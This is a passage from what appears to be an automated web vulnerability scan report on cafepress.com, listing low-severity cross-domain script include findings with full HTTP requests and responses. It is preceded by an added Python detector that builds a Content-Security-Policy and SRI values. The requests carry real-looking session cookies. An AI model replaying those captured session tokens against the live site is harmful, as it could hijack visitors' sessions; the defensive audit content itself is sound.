<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
<![endif]--><script type="text/javascript" src="http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"> </script>...[SNIP]...
</script> Criteo US End--><script type="text/javascript" src="http://content3.cpcache.com/js/cartv2.js"> </script>...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
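Every "cross-domain script include" entry in this section (5.51 through 5.60 and the rest of section 5) reports the same condition: the page loads JavaScript from an origin other than www.cafepress.com, so whoever controls that origin, or can tamper with the plain-HTTP fetch of it, runs code in the page with full access to its DOM and cookies. The following Python is an added example, not code from the XSS.CX report or from Burp Suite's own check. It reproduces the detection over a constructed response body modelled on the /cp/viewcart.aspx evidence above, handling the two cases a naive regex misses (protocol-relative src values and scripts inside IE conditional comments, which the evidence shows this site uses), and then derives the two controls a practitioner would reach for: a Content-Security-Policy script-src allow-list built from the observed origins, and a Subresource Integrity value for a fetched script. The sample HTML, the page URL and all function names are assumptions.

```python
"""Reproduce the 'cross-domain script include' check over an HTML response.

Added example, not code from the XSS.CX report or from Burp Suite. The sample
response body, the page URL and every function name here are assumptions.
"""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

_DEFAULT_PORTS = {"http": 80, "https": 443}


class _ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value.strip())

    def handle_comment(self, data):
        # Old IE executed scripts inside conditional comments (<!--[if IE]> ... <![endif]-->),
        # so a check that skips comments under-reports; rescan the comment body.
        if data.lstrip().startswith("[if"):
            inner = _ScriptSrcParser()
            inner.feed(re.sub(r"<!\[endif\]", "", data))
            inner.close()
            self.srcs.extend(inner.srcs)


def script_sources(html):
    """All external script references (src values) found in the body."""
    parser = _ScriptSrcParser()
    parser.feed(html)
    parser.close()
    return parser.srcs


def _origin(url, page_url):
    """(scheme, host, port) a script URL resolves to, or None for non-HTTP schemes.

    Relative paths are same-origin; protocol-relative "//host/x.js" inherits the page scheme.
    """
    page = urlsplit(page_url)
    ref = urlsplit(url)
    if ref.scheme and ref.scheme not in _DEFAULT_PORTS:   # data:, javascript:, ...
        return None
    if not ref.netloc:
        ref = page
    scheme = ref.scheme or page.scheme
    return (scheme, ref.hostname or "", ref.port or _DEFAULT_PORTS[scheme])


def external_scripts(html, page_url):
    """Script URLs whose origin differs from the page's: the scanner's finding."""
    page_origin = _origin(page_url, page_url)
    return [src for src in script_sources(html)
            if _origin(src, page_url) not in (None, page_origin)]


def external_origins(html, page_url):
    """Distinct third-party origins, first-seen order: each is a host the page fully trusts."""
    seen = []
    for src in external_scripts(html, page_url):
        origin = _origin(src, page_url)
        if origin not in seen:
            seen.append(origin)
    return seen


def csp_script_src(html, page_url):
    """A Content-Security-Policy script-src directive allowing only the observed hosts."""
    sources = ["'self'"]
    for scheme, host, port in external_origins(html, page_url):
        suffix = "" if port == _DEFAULT_PORTS[scheme] else f":{port}"
        sources.append(f"{scheme}://{host}{suffix}")
    return "script-src " + " ".join(sources)


def sri_integrity(script_bytes):
    """Subresource Integrity value for a fetched script: pins its content, not just its host."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


# Constructed response body modelled on the /cp/viewcart.aspx evidence; not a real capture.
PAGE_URL = "http://www.cafepress.com/cp/viewcart.aspx"
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://www.cafepress.com:80/js/local.js"></script>
<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
<!--[if lt IE 9]><script src="http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"></script><![endif]-->
<script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js"></script>
<script type="text/javascript" src="https://content3.cpcache.com:443/js/cartv2.js"></script>
<script type="text/javascript">var cartItemCount = 0;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src in external_scripts(SAMPLE_HTML, PAGE_URL):
        print("cross-domain script include:", src)
    print(csp_script_src(SAMPLE_HTML, PAGE_URL))
    print(sri_integrity(b"alert(1)"))
```

The generated directive is only a starting point: 'self' already covers the two same-origin includes, and the remaining hosts still have to be reviewed one by one. In the evidence above the content0 through content7 hosts under cpcache.com behave like the site's own CDN, while www.googleadservices.com is a genuine third party; CSP limits which hosts may supply script, but only SRI (or serving the script from the page's own origin) stops a changed file on an allowed host from running, and SRI is only practical for scripts whose content is stable.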
5.52. http://www.cafepress.com/cp/viewcart.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/viewcart.aspx
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/js/cartv2.js
http://content4.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://www.googleadservices.com/pagead/conversion.js
Request
GET /cp/viewcart.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 51119
Date: Sun, 26 Dec 2010 13:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
<![endif]--><script type="text/javascript" src="http://content4.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"> </script>...[SNIP]...
</script> Criteo US End--><script type="text/javascript" src="http://content3.cpcache.com/js/cartv2.js"> </script>...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
5.53. http://www.cafepress.com/make/birth-announcements
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/birth-announcements
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54454
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.54. http://www.cafepress.com/make/custom-baby-gear
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-baby-gear
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 71150
Date: Sun, 26 Dec 2010 13:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</style><script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.55. http://www.cafepress.com/make/custom-buttons
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-buttons
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 54710
Date: Sun, 26 Dec 2010 13:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.56. http://www.cafepress.com/make/custom-hats
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hats
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54657
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hoodies-sweatshirts
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 